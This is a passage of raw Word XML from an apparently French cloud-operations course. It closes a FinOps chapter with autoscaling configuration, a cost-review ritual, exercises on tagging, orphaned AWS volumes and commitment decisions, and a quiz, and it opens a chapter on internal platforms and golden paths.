        </w:trPr>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Charge stable 24/7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Bon candidat à l'engagement</w:t>
            </w:r>
          </w:p>
        </w:tc>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Réserver</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un autoscaling borné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Politique d'autoscaling fondée sur une métrique utile</w:t>
        <w:br/>
        <w:t>apiVersion: autoscaling/v2</w:t>
        <w:br/>
        <w:t>kind: HorizontalPodAutoscaler</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: api</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: production</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  scaleTargetRef: { apiVersion: apps/v1, kind: Deployment, name: api }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  minReplicas: 3</w:t>
        <w:br/>
        <w:t xml:space="preserve">  maxReplicas: 20</w:t>
        <w:br/>
        <w:t xml:space="preserve">  metrics:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    - type: Resource</w:t>
        <w:br/>
        <w:t>resource: { name: cpu, target: { type: Utilization, averageUtilization: 65 } }</w:t>
        <w:br/>
        <w:t xml:space="preserve">  behavior:</w:t>
        <w:br/>
        <w:t xml:space="preserve">    scaleDown:</w:t>
        <w:br/>
        <w:t xml:space="preserve">      stabilizationWindowSeconds: 300</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L'AUTOSCALING NE REMPLACE PAS LE DIMENSIONNEMENT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Un service qui met trois minutes à démarrer ou qui dépend d'une base saturée ne gagne rien à multiplier les réplicas. L'autoscaling absorbe les variations, il ne corrige pas un goulot.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>88.5 Le rituel</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>FinOps est une pratique régulière, pas un projet ponctuel. Un rituel mensuel suffit : regarder, attribuer, décider, vérifier.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.348 — Quatre rythmes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57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Rythme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="360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Question</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Participants</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Hebdomadaire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Une anomalie est-elle apparue ?</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Astreinte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Mensuel</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Quel est le coût unitaire ?</w:t>
            </w:r>
          </w:p>
        </w:tc>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Équipe et produit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2575"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Trimestriel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Les engagements sont-ils adaptés ?</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Finance et technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Annuel</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L'architecture reste-t-elle justifiée ?</w:t>
            </w:r>
          </w:p>
        </w:tc>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Direction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Cinq chiffres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Tableau de bord minimal</w:t>
        <w:br/>
        <w:t># 1. Dépense du mois et projection</w:t>
        <w:br/>
        <w:t># 2. Coût par commande et par utilisateur actif</w:t>
        <w:br/>
        <w:t># 3. Top 5 des services par dépense</w:t>
        <w:br/>
        <w:t># 4. Ressources non étiquetées (objectif : zéro)</w:t>
        <w:br/>
        <w:t># 5. Économies réalisées et vérifiées</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PILOTER LES COÛTS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Étiqueter avant d'optimiser.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Attribuer chaque dépense à une équipe.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Comparer la dépense à l'usage, pas au mois précédent seul.</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Traiter d'abord les ressources orphelines.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S'engager seulement sur un usage stable et mesuré.</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facture reflète les choix d'architecture.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Sans étiquettes, aucune attribution n'est possible.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coût unitaire relie la dépense à la valeur.</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anomalie se juge en relatif à l'usage.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ressources orphelines sont le premier gisement.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engagements ne valent que sur un usage stable.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économie qui dégrade la fiabilité est un transfert de coût.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rituel mensuel vaut mieux qu'un audit annuel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les coûts sont pilotés. Le chapitre suivant outille les équipes pour livrer sans dépendre d'un expert.</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88.1 — Étiqueter et attribuer</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La facture ne distingue pas la recette de la production.</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Choisissez trois étiquettes.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Appliquez-les dans le code.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l'absence de ressource non étiquetée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 88.2 — Trouver des ressources orphelines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   EXPLOITATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le compte contient des volumes et des adresses inutilisés.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Listez les volumes détachés.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Listez les adresses libres.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Chiffrez l'économie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 88.3 — Arbitrer un engagement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   FINANCE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une remise de 30 % sur trois ans est proposée.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Vérifiez la stabilité de l'usage.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Calculez le point mort.</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Décidez.</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88.1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>locals {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  etiquettes = {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    application   = "boutique"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    environnement = var.environnement</w:t>
        <w:br/>
        <w:t xml:space="preserve">    proprietaire  = "equipe-boutique"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t># Politique : toute ressource sans ces trois étiquettes est refusée</w:t>
        <w:br/>
        <w:t># par un contrôle de conformité dans le pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une étiquette appliquée manuellement finit toujours par manquer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le contrôle doit être automatisé pour être fiable dans le temps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 88.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>aws ec2 describe-volumes --filters Name=status,Values=available \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --query 'Volumes[].[VolumeId,Size,CreateTime]' --output table</w:t>
        <w:br/>
        <w:br/>
        <w:t>aws ec2 describe-addresses --query 'Addresses[?AssociationId==null].[PublicIp]'</w:t>
        <w:br/>
        <w:br/>
        <w:t># Économie mensuelle = somme(taille_Go × prix_Go_mois) + IP non associées</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un volume détaché reste facturé : il ne coûte rien à supprimer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Vérifiez la date de création avant de supprimer : un volume récent peut être en cours de migration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 88.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Usage : 8 instances en moyenne, stable depuis 9 mois</w:t>
        <w:br/>
        <w:t>Variation mensuelle : ±1 instance</w:t>
        <w:br/>
        <w:t>Engagement proposé : 10 instances sur 3 ans, −30 %</w:t>
        <w:br/>
        <w:br/>
        <w:t>Risque : si le projet migre vers une autre architecture, l'engagement</w:t>
        <w:br/>
        <w:t>reste dû. Décision : engager 6 instances (75 % du plancher observé),</w:t>
        <w:br/>
        <w:t>garder le reste à la demande.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>N'engagez jamais la pointe : engagez le plancher observé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un engagement est une dette : il doit rester inférieur à l'usage minimal crédible.</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 permet l'étiquetage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Chiffrer les données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Attribuer les coûts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Accélérer le réseau</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Réduire la latence</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Quel est le premier gisement d'économie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Les engagements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Les ressources orphelines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Les remises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 change</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Quand un engagement est-il raisonnable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Sur la pointe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Sur le plancher d'usage stable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Au hasard</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Toujours</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Pourquoi comparer la dépense à l'usage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Pour la comptabilité</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Pour distinguer croissance et dérive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Pour payer moins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Pour la conformité</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 mesure le coût unitaire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Le prix d'une instance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La dépense par unité de valeur</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La marge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 budget</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Sans étiquette, la facture reste un total opaque.</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Elles coûtent sans produire de valeur.</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Il faut rester en dessous de l'usage minimal crédible.</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Une hausse avec la charge est saine ; une hausse à charge constante est une dérive.</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Il relie la dépense à l'activité réelle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>89. Plateforme interne et chemins d'or</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Faire de l'infrastructure un produit qui accélère les équipes au lieu de les ralentir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Avancé · Prérequis : chapitre 88</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Distinguer plateforme et tuyauterie.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Définir un chemin d'or et son contrat.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Concevoir un modèle de service réutilisable.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Mesurer l'adoption et le délai de mise en production.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Éviter la plateforme qui devient un goulot.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>89.1 Une plateforme est un produit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une plateforme interne fournit des capacités prêtes à l'emploi : déploiement, observabilité, secrets, bases, environnements. Comme un produit, elle a des utilisateurs, un contrat et une mesure de satisfaction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.349 — Trois approches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83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Approche</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Ce que fait l'équipe</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Résultat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Tuyauterie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Chaque équipe assemble ses outils</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Divergence et dette</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Plateforme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Capacités fournies et supportées</w:t>
            </w:r>
          </w:p>
        </w:tc>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Standard et rapidité</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2833"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Centre de services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>L'équipe plateforme agit à la place</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File d'attente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CHEMIN D'OR</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Parcours outillé et documenté qui permet de livrer un service conforme sans décision d'architecture préalable. Il est suffisant pour la majorité des cas, sans être obligatoire.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="3238500"/>
            <wp:docPr id="105" name="Picture 105"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f103.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId145"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="3238500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.103 — Le parcours d'un nouveau service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un service en une commande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Créer un service depuis le modèle</w:t>
        <w:br/>
        <w:t>platform new service boutique-catalogue --owner equipe-catalogue</w:t>
        <w:br/>
        <w:br/>
        <w:t># Ce qui est produit</w:t>
        <w:br/>
        <w:t>boutique-catalogue/</w:t>
        <w:br/>
        <w:t>├── .github/workflows/ci.yml      # fourni, à jour</w:t>
        <w:br/>
        <w:t>├── deploy/base/                  # manifestes de référence</w:t>
        <w:br/>
        <w:t>├── deploy/env/{recette,prod}/    # surcouches</w:t>
        <w:br/>
        <w:t>├── infra/main.tf                 # base, file, secrets</w:t>
        <w:br/>
        <w:t>├── docs/runbook.md               # squelette à compléter</w:t>
        <w:br/>
        <w:t>└── README.md                     # comment livrer</w:t>
